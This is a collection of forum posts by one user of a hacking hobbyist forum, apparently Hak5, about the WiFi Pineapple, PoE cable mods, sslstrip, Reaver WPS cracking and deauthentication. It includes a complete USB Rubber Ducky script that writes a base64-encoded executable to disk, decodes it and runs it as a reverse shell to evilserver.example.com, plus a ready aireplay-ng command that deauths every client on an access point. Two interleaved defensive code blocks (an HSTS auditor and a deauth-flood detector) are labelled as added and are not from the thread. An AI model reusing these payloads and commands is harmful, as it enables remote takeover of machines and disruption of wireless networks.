Posts: 803
Days Won: 12
Posts posted by telot
-
Well, my whole thing is when they are going to have the new ones come out. I really would like to buy one. At the moment I'm trying to read on it before I get it, that way I could understand how it works. I'm a little confused on one thing. After watching the videos of Darren at the airport and stuff, I notice he has the pineapple connected to his laptop. I get that all the other laptops and devices will connect to the pineapple. But does your laptop have to be connected to the SSID to give those devices that are connecting to the pineapple internet access?
If you're playing the man in the middle, I guess you would have to be running Wireshark to catch all the URLs and passwords, correct? It would be nice to have some videos once you get it, and how it works. I know when I bought the Alfa card the DVD was the best thing to help me understand how it worked, and the examples Darren had.
I've been waiting to buy my first pineapple, but does anyone know when they might have them in stock again?
You don't connect to the SSID of the pineapple. Your laptop is connected to a (non-pineapple) access point via its internal wifi adapter to get internet to the laptop. The pineapple is then plugged in via ethernet cable to the laptop. Configure the laptop (if in Linux, run ./wp3.sh from wifipineapple.com for easy mode) for ICS (internet connection sharing), thereby bridging your laptop's wifi adapter internet through to the ethernet port on the laptop, and over to the pineapple. The pineapple then creates its own access point and begins pineappleing the world around you.
telot
-
Pineapple runs hostapd instead of airbase-ng due to stability if I'm not mistaken.
And I can understand why. I've been playing with airbase-ng for a few days now, and I've found it to be very unreliable. Sometimes my DHCP server plays nice, sometimes it doesn't. When it doesn't, sometimes certain devices will auto-assign themselves an IP (169.xxx.xxx.xxx range) and sometimes that same device refuses, and other devices simply will not play ball at all. Whilst wiresharking all these inconsistencies I noticed erratic behavior from airbase as the common denominator. It's a great tool, but I don't think it's nearly as refined as other tools in the aircrack suite (such as airmon, airodump, and of course aircrack). It's definitely best to stick with the pineapple.
You can use the butt end of a screw driver to pound in a nail, and still use that screwdriver for many other things (screwing screws, pry bar, inner ear scratcher) but using a tool that was built with pounding a nail in mind works much better and is worth the cost.
telot
-
A laptop can easily respond to any probe request and respond by initializing an authentication request and then an association request. See airbase-ng. The pineapple is just so damn convenient and awesome. I can attach a high dB gain antenna, I can automate it easier, as its purpose is focused, and there's a great community based around it (ahem). Yes, there's lots of reasons to go with the pineapple.
telot
-
Yeah, the best thing would be to use a screen like the kind used on house windows or something. Also, the low profile type of fan may be hard to find. You might have to trim some of the plastic to get it to fit properly.
The reason for the offset hole is because of some components on the inside. Also the fans I used were a perfect match because it actually gave some room to let air flow through the fan; unlike this other 5V fan I had.
And yes, the temp differences were amazing. From ~130F/54.4C to ~90F/32.2C on the OM1P with 2.0.1 firmware after 3 hours.
The best part about this mod is that it was pretty simple if you have the tools (mostly the drill bits) and take apart the plastic connector to have the crimp on pins still attached. And using the VCC and GND on the board was a HUGE "DUH!" moment when I was trying to find an external way to power this. Finally it clicked that it should have ~5V on that pin I had totally forgot about.
The OM1P was the first one I did. Took about an hour (not counting adhesive drying time). The AP51 was modded up in about 10 minutes (minus adhesive drying time) because I knew when the taper bit hit the block of wood going through the PVC pipe, it was the correct size. That part worked out by chance.
Badassness. Well done sir!
telot
-
I received this comment from the man himself...
"Both use HSTS headers now, so if you're using a browser that supports them (like Chrome), there's no opportunity for sslstrip to do anything. That output is from Twisted, and it doesn't indicate any actual problem."
UPDATE1:
http://www.owasp.or...nsport_Security
UPDATE2:
SSLStrip still works against Safari
Definitely broken with FF and Chrome tho : (
Now what?
UPDATE3:
"HSTS fixes this problem by informing the browser that connections to the site should always use SSL. Of course, the HSTS header can be stripped by the attacker if this is the user's first visit. Chrome attempts to limit this problem by including a hard-coded list of HSTS sites.[11] Unfortunately this solution cannot scale to include all websites on the internet; a more workable solution can be achieved by including HSTS data inside DNS records, and accessing them securely via DNSSEC."
Thanks for following through on this Diggler! I was just going to get into sslstrip this weekend, so this is some great food for thought. Thanks very much
telot
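Following up on the HSTS discussion in the quoted comments above, here is an added example (my own code, not from the original poster, sslstrip, or the OWASP page) that parses a Strict-Transport-Security header the way a site audit would, flags weak settings, and models why a first visit to a host that is not on the preload list is still exposed to stripping. The one-year minimum is the current hstspreload.org requirement; the header values in the usage are constructed.

```python
"""Audit a Strict-Transport-Security header and model first-visit exposure.
Added example; not code from the forum post."""

from dataclasses import dataclass
from typing import List, Optional

# Current hstspreload.org requirement: max-age of at least one year.
PRELOAD_MIN_MAX_AGE = 31536000


@dataclass
class HstsPolicy:
    max_age: Optional[int]
    include_subdomains: bool
    preload: bool


def parse_hsts(header: str) -> HstsPolicy:
    """Parse directives per RFC 6797: names are case-insensitive, ';' separated."""
    max_age = None
    include_sub = False
    preload = False
    for raw in header.split(";"):
        directive = raw.strip()
        if not directive:
            continue
        name, _, value = directive.partition("=")
        name = name.strip().lower()
        value = value.strip().strip('"')
        if name == "max-age":
            try:
                max_age = int(value)
            except ValueError:
                max_age = None  # malformed value: browsers ignore the header
        elif name == "includesubdomains":
            include_sub = True
        elif name == "preload":
            preload = True
    return HstsPolicy(max_age, include_sub, preload)


def audit_hsts(header: str) -> List[str]:
    """Return findings for a header value; an empty list means nothing to flag."""
    p = parse_hsts(header)
    findings = []
    if p.max_age is None:
        findings.append("max-age missing or malformed: header is ignored by browsers")
    elif p.max_age == 0:
        findings.append("max-age=0 clears the policy; host is not protected")
    elif p.max_age < PRELOAD_MIN_MAX_AGE:
        findings.append("max-age below one year; policy expires quickly and blocks preloading")
    if not p.include_subdomains:
        findings.append("includeSubDomains absent; subdomains can still be downgraded")
    if p.preload and (p.max_age is None or p.max_age < PRELOAD_MIN_MAX_AGE
                      or not p.include_subdomains):
        findings.append("preload directive present but preload requirements not met")
    return findings


def first_visit_protected(header: str, host_preloaded: bool, cached_policy: bool) -> bool:
    """HSTS only helps once the browser already knows the policy, either from the
    preload list or from an earlier HTTPS visit. A stripped first visit never
    delivers the header, so the header text alone cannot protect that visit."""
    p = parse_hsts(header)
    if host_preloaded:
        return True
    return cached_policy and p.max_age is not None and p.max_age > 0


if __name__ == "__main__":
    # Constructed header values, not taken from any real site.
    for h in ("max-age=31536000; includeSubDomains; preload", "max-age=300", "max-age=0"):
        print(h, "->", audit_hsts(h) or "OK")
    print("first visit, not preloaded:",
          first_visit_protected("max-age=31536000", host_preloaded=False, cached_policy=False))
```

The last call is the point of UPDATE3 in code: a strong header is irrelevant on the very first plaintext visit unless the host is on the browser's preload list.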
-
Man. I have done terrible, terrible things for pitchers of margaritas.
If I would have just known setting security for a router would have gotten me that, I would need a lot less shots every time I go to the doctor's.
rofl was thinking the same damn thing...
telot
-
Telot: can you help me with this? Because I can't find any configuration for "entire access point deauthing" :( :(
I just tested deauthing 1 AP and it works. How can I deauth the entire access point, someone?
0xphk is correct. By leaving the Client Mac field blank, and just filling in the access point's BSSID, I was able to kick every client off the access point with one click. So the pineapple just ran a simple command of: aireplay-ng -0 30 -a XX:XX:XX:XX:XX:XX mon0 where -0 means deauth, 30 is the number of deauths to send (I like to just hammer my APs lol), -a is the access point, which if left without a -c for client mac address, will deauth the entire access point. I'm sorry if I wasn't very specific in the comment. Currently I cannot get airdrop-ng to work; that would deauth every access point and every client on every access point, which I think you might be alluding to here. I'll keep working on it, but as I'm back to work now, I've got a lot less time to play with my pineapple :( Has anyone else gotten airdrop-ng to work on the mark3?
telot
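As an added defensive counterpart to the aireplay-ng command in the post above (example code of my own, not the pineapple's, aireplay-ng's, or the poster's), this parses raw 802.11 management frames and raises an alert when one BSSID sends a burst of broadcast deauthentication frames, which is exactly what `-0 30 -a BSSID` without `-c` looks like on the air. The capture, the BSSIDs and the 30-frame burst are constructed inline and assumed to mirror the post; real monitor-mode captures carry a radiotap header that must be stripped first.

```python
"""Flag broadcast deauthentication floods in raw 802.11 frames.
Added example; the frames below are constructed, not captured."""

from collections import defaultdict, deque
import struct

BROADCAST = b"\xff" * 6
MGMT_TYPE = 0
DEAUTH_SUBTYPE = 12  # management frame subtype 12 = deauthentication


def parse_80211_header(frame: bytes):
    """Return (type, subtype, addr1, addr2, addr3) or None if the frame is too short.
    Assumes the radiotap header has already been removed."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    ftype = (fc0 >> 2) & 0x3
    subtype = (fc0 >> 4) & 0xF
    addr1 = frame[4:10]    # receiver / destination
    addr2 = frame[10:16]   # transmitter / source
    addr3 = frame[16:22]   # BSSID for frames sent by the AP
    return ftype, subtype, addr1, addr2, addr3


def mac_str(mac: bytes) -> str:
    return ":".join(f"{b:02x}" for b in mac)


def detect_deauth_floods(capture, threshold=10, window=5.0):
    """capture: iterable of (timestamp_seconds, frame_bytes), in time order.
    Returns {bssid: peak count} for every BSSID that sent at least `threshold`
    broadcast deauths inside any sliding `window`."""
    recent = defaultdict(deque)
    alerts = {}
    for ts, frame in capture:
        parsed = parse_80211_header(frame)
        if parsed is None:
            continue
        ftype, subtype, addr1, _addr2, addr3 = parsed
        if ftype != MGMT_TYPE or subtype != DEAUTH_SUBTYPE:
            continue
        if addr1 != BROADCAST:
            continue  # a single targeted deauth is normal AP housekeeping
        bssid = mac_str(addr3)
        stamps = recent[bssid]
        stamps.append(ts)
        while stamps and ts - stamps[0] > window:
            stamps.popleft()
        if len(stamps) >= threshold:
            alerts[bssid] = max(alerts.get(bssid, 0), len(stamps))
    return alerts


def build_deauth(bssid: bytes, dst: bytes = BROADCAST, reason: int = 7) -> bytes:
    """Construct a minimal deauth frame (no FCS) as test input."""
    fc = bytes([DEAUTH_SUBTYPE << 4, 0x00])
    return fc + b"\x00\x00" + dst + bssid + bssid + b"\x00\x00" + struct.pack("<H", reason)


def build_beacon(bssid: bytes) -> bytes:
    """Construct a minimal beacon (subtype 8) so the detector sees benign traffic too."""
    fc = bytes([8 << 4, 0x00])
    return fc + b"\x00\x00" + BROADCAST + bssid + bssid + b"\x00\x00" + b"\x00" * 12


# Constructed sample: one AP hit with 30 broadcast deauths in 1.5 s (the post's
# "-0 30"), another AP that only beacons and sends one legitimate targeted deauth.
AP_FLOODED = bytes.fromhex("001122334455")
AP_QUIET = bytes.fromhex("66778899aabb")
SAMPLE_CAPTURE = sorted(
    [(0.1 * i, build_beacon(AP_QUIET)) for i in range(20)]
    + [(1.0, build_deauth(AP_QUIET, dst=bytes.fromhex("0a0b0c0d0e0f")))]
    + [(0.05 * i, build_deauth(AP_FLOODED)) for i in range(30)],
    key=lambda entry: entry[0],
)

if __name__ == "__main__":
    print(detect_deauth_floods(SAMPLE_CAPTURE))  # expect only the flooded BSSID
```

A wireless IDS would also key on the sequence-number pattern and on deauths whose source is the AP but whose signal strength differs from the AP's beacons; the frame-count threshold above is the simplest signal and is enough to separate the post's burst from an AP's normal housekeeping.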
-
Let me ask you this, websites like backtrack-linux.org, hackersforcharity.org, social-engineer.org, secmaniac.com, lares.com, makeiturz.com, etc, what do they all have in common? They were created in notepad++, not a wysiwyg program. I code all my sites by hand. Would you say the results of those sites are "really shitty"?
WYSIWYG is just that, but if you want to make web pages without having to know how to code and make a web page, then buy Photoshop and Dreamweaver and it pretty much does all the work for you. If you want to learn how to code custom websites, then use Notepad and read up on coding in XHTML, CSS, PHP and JavaScript.
Ok ok ok, you got me. Let me rephrase it. If you don't know what you're doing and you code it in Notepad, it'll be really shitty. I didn't at all mean to step on any Notepad enthusiasts' toes. I was more addressing the OP, and his want to quickly and easily come up with a decent looking webpage. If you want to really excel at it, by all means Notepad's the way to go - if you just want to make a quicky website for a friend/family member, WYSIWYG is the best bet.
telot
-
I'm doing Defcon and Derby as well. We should arrange a hak5forums hang time at Derby! Grab a few beers? Try and get some suckers onto our pineapples? hehe
telot
-
Just a thought, how about a Raspberry Pi running ARM BT5........
Haha, I thought if I mentioned the Raspberry Pi + pineapple combo one more time, I'd be accused of being a broken record.
YES YES and more YES. It's going to be awesome.
telot
-
If you want to see an example of a website created entirely in Notepad++, check out my awful website at telot.org!
Haha, seriously, don't make a website entirely in Notepad++... it's really shitty - both the process of making it, and the result :)
If you're looking for a WYSIWYG (what you see is what you get) or GUI based website creator, check out NVU. It's free, easy to use, and has a section where you can upload the page you just created to your web server. So no need to upload via SCP or SFTP or anything. Enjoy!
telot
-
Hi Telot.
Well, I made a similar cable for the Mk1 and I am currently using it for the MkIII. Just an idea: if you use a dual corded USB cable, the voltage measured on mine is now 8.7 V. It is stable and working 100%. I used a short cable since I have the AP51 attached to the back of my screen using a suction cup.
That's badass! I should've tested the dual USB cable... an electrical engineer friend of mine told me the dual USB just increased the current going down the line, not the voltage. Turns out he must be a liar! Thanks for the heads up Thetra!
telot
-
This is great, thanks telot!! Nice work and thanks for sharing!! :)
No problem hfam, its my pleasure. So it is also my pleasure to share my latest version of this cable :)
This time I used the wind-up ethernet cable that came with the pineapple, as it's a much cleaner look. Enjoy!
www.telot.org/betterusbpoecable1.jpg
www.telot.org/betterusbpoecable2.jpg
www.telot.org/betterusbpoecable3.jpg
www.telot.org/betterusbpoecable4.jpg
www.telot.org/betterusbpoecable5.jpg
telot
-
I'm not in the UK, so it's a bit difficult to relate. But you should check out the Raspberry Pi Foundation. They are a UK charity that is creating a very inexpensive computer for educational purposes (and hacking/making too :) ). Perhaps you could coordinate your curriculum with the Raspberry Pi in mind, or offer to run a pilot project with them or something. Their website is www.raspberrypi.org
Hope it proves fruitful
lolz fruitful
telot
-
Electrical tape is evil.
Heat shrink works much better, and doesn't get sticky after a week or so.
Agreed! I ran out of shrink tube during the tutorial though :( This was more of a proof of concept - next I'm going to mod the wind-up ethernet cable that came with the pineapple. That will be done with all heat shrink for sure.
telot
-
1. That session resume feature is included only in the commercial version. Which I just read (but haven't confirmed) that the source for the commercial version is now available as well. I'll give it a shot asap.
2. So ars reset the router when needed? I guess if your attack wasn't working and there were other (legitimate) users on the access point, you could deauth them off with aireplay -0, though I'm not sure how the deauth would affect the reaver. If a legit user was deauth'd for long enough, eventually the AP would get reset. Not sure how many times that will work though, and it vastly increases the risk. So no reaver'ing after hours if that's the case.
3. 1.3 beta is what I have at the moment - I'll check to see if there's any updates when I get home (mobile right now). Fingers crossed!
I agree, they are definitely working out the bugs, as reaver is hot off the presses. It's exciting to be using cutting edge tools though, gotta say.
telot
-
Hey all - I just got my ducky today. I ran my hello world and all that jazz. Next I went to get the reverse shell script to work (the one on the wiki) in Windows 7 64-bit. I found that you can't run reverse.exe in a 64-bit cmd.exe. Instead, you have to run this program: %windir%\SysWoW64\cmd.exe which will allow it to run. I've incorporated the workaround into the script, via a GUI r command. The script in its entirety is found below. Enjoy
telot
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 300
ENTER
DELAY 600
LEFTARROW
ENTER
DELAY 400
STRING copy con c:\decoder.vbs
ENTER
STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS =
STRING CreateObject("Scripting.FileSystemObject"):
ENTER
STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded =
STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function
STRING decodeBase64(base64):
ENTER
STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub
STRING writeBytes(file, bytes):Dim binaryStream:
ENTER
STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
ENTER
CTRL z
ENTER
STRING copy con c:\reverse.txt
ENTER
STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA
ENTER
STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA
ENTER
STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA
ENTER
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ENTER
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS
ENTER
STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA
ENTER
STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2
ENTER
STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A
ENTER
STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA
ENTER
STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA
ENTER
STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq
ENTER
STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF
ENTER
STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv
ENTER
STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp
ENTER
STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm
ENTER
STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A
ENTER
STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s
ENTER
STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9
ENTER
STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp
ENTER
STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY
ENTER
STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B
ENTER
STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk
ENTER
STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA
ENTER
STRING AAxAAADpdL7//wAAAAIAAAAMQAAA
ENTER
CTRL z
ENTER
STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe
ENTER
STRING exit
ENTER
GUI r
DELAY 50
STRING %windir%\SysWoW64\cmd.exe
ENTER
DELAY 200
STRING c:\reverse.exe evilserver.example.com 8080
ENTER
STRING exit
ENTER
-
In another thread we were discussing POE to the pineapple. Here is my hacked cable that is POE and as a bonus, derives its power from a spare USB port. You can find the tutorial on my website, telot.org. Direct link: www.telot.org/usbpoehack.html
Also, apologies to my lower resolution brothers, the pics in this tutorial are huge as I didn't want to lose out on some of the detail.
Enjoy!
telot
-
Which OS are you running? As mentioned before trying both Windows XP and BT5r1
Are you setting up an internet (wlan0?) connection first before connecting the pineapple? Yes, wlan0
Are you using the wp3.sh script? Yes, tried it a few times, rebooting each time for a clean slate. I get the same error as the OP, "Destination Host Unreachable".
Thanks
I often have to run the wp3.sh script several times before it will work. Not really sure why, but I usually have to do it 2 or 3 times before I get a ping back. Try it a few times, without rebooting in between tries.
telot
-
Association log confirmed not working. Everything else Karma related seems to be working great. I fired up my 'victim' test box and it got karma'd immediately upon bootup. Testing some deauth goodness now :)
EDIT: I changed the AP channel to 6, to match my router I'm trying to deauth. I rebooted the pineapple to ensure the changes took effect. Now association log is working fine. Strange...
EDIT#2: Entire access point deauth'ing successful. Karma didn't stop or miss a beat whatsoever. Now I'll try deauthing a particular client on that access point. Things are looking good Seb!
EDIT#3: Specifying a client works beautifully. :)
telot
-
Think we can do anything with it?
http://www.alfa.com.tw/in/front/bin/ptdetail.phtml?Part=R36&Category=105483
Processor: Ralink RT3050F @ 320Mhz
Flash: MXIC MX29LV640EBTI-70G (not sure what size)
RAM: EtronTech EM63A165TS-6G
One USB port
One Serial Port @ 115200bps
One WAN
One LAN
2 buttons - reset to factory default and one for the WPS
I'm seeing an interceptor with a cellular internet connection via USB dongle for VPN'ing in and using the wifi for a pineapple. Everything rolled into one, with access to it from anywhere in the world :) Let's DO EET!
telot
-
According to the Reaver creator, it should not take more than 10 hours to recover the password; if it's taking way longer then there must be something wrong.
I'm using the rtl8187 driver for the Alfa USB 036H. The router I'm using is a crappy old WNDR2000 with WPS enabled. I'm thinking it's some option in my command.
sudo ./reaver -i mon0 -b XX:XX:XX:XX:XX -t 3 -d 10 -vv
Anything in that command stand out as totally wrong? I've modified the -t to 4 and 5, and changed the -d from 0 to 15.
And about the DoS'ing the router - I'm pretty sure that is what is happening. The router does NOT function as normal until I reset it (sometimes it requires pushing in the Full Restore hard reset button). Is this avoidable through the above operators (-d and -t)? I read somewhere (frantically searching for link, but cannot find it) that reaver can break crappier (slow, old, cheap) routers, but more robust routers handle the PIN trials just fine. Have any of you got it work on certain routers but not others?
I agree with Bobbyb - this could be the exploit of the year/decade if it works out, particularly for us wifi scoundrels. Thanks for your comments thus far, and for any further insight you can share.
telot
-
Update:
Log has been fixed, I will update the first post in a few minutes
Swoot! Thank you very much Seb. I will try out this new version as soon as it's posted.
Mr. Protocol/Seb - sign me up for the dev team as well! Enthusiastic and driven beta tester right here! :)
telot
-
Hi everyone
I saw in tech specs of the AP51 that it supports PoE (Power over Ethernet) and was wondering if anyone has tried that route yet? I saw a PoE adapter made by Alfa for $24.99 Link and would this be the right thing to get for this device? and would there be a way to get this to power off of my laptop's ethernet port or do laptop ethernet ports not support pins 4,5 and 7,8 for power and return? Just thought it would be smart to power and use the pineapple off of one port and use what alfa gave us.
Thanks
Pacmandu
POE is extremely simple. Way more simple than people make it out to be imho. Laptops do not support power over 4,5 and 7,8 - however it'd be real simple to wire the 5V from your USB port into an ethernet cable and have that bring power down to your pineapple. I power mine with a hacked USB cable - this solution just removes that extra cable from the situation. This solution would be particularly effective if you wanted to have your pineapple very very far away from the computer you're sniffing with. I just may build one of these cables this afternoon. If I do, I'll certainly post pics/tutorial :)
Here is a great guide on getting started with POE.
http://tuxgraphics.org/electronics/200903/hobby-poe.shtml
telot
-
Reaver Brute Force Attack Tool Cracking (posted in Security)
Thanks very much for posting your research Vodmya. You motivated me to pick it up again (especially now that resume works well! woo!). Did you happen to record which settings (I imagine -d and -t?) worked for which router models? Thanks again man
telot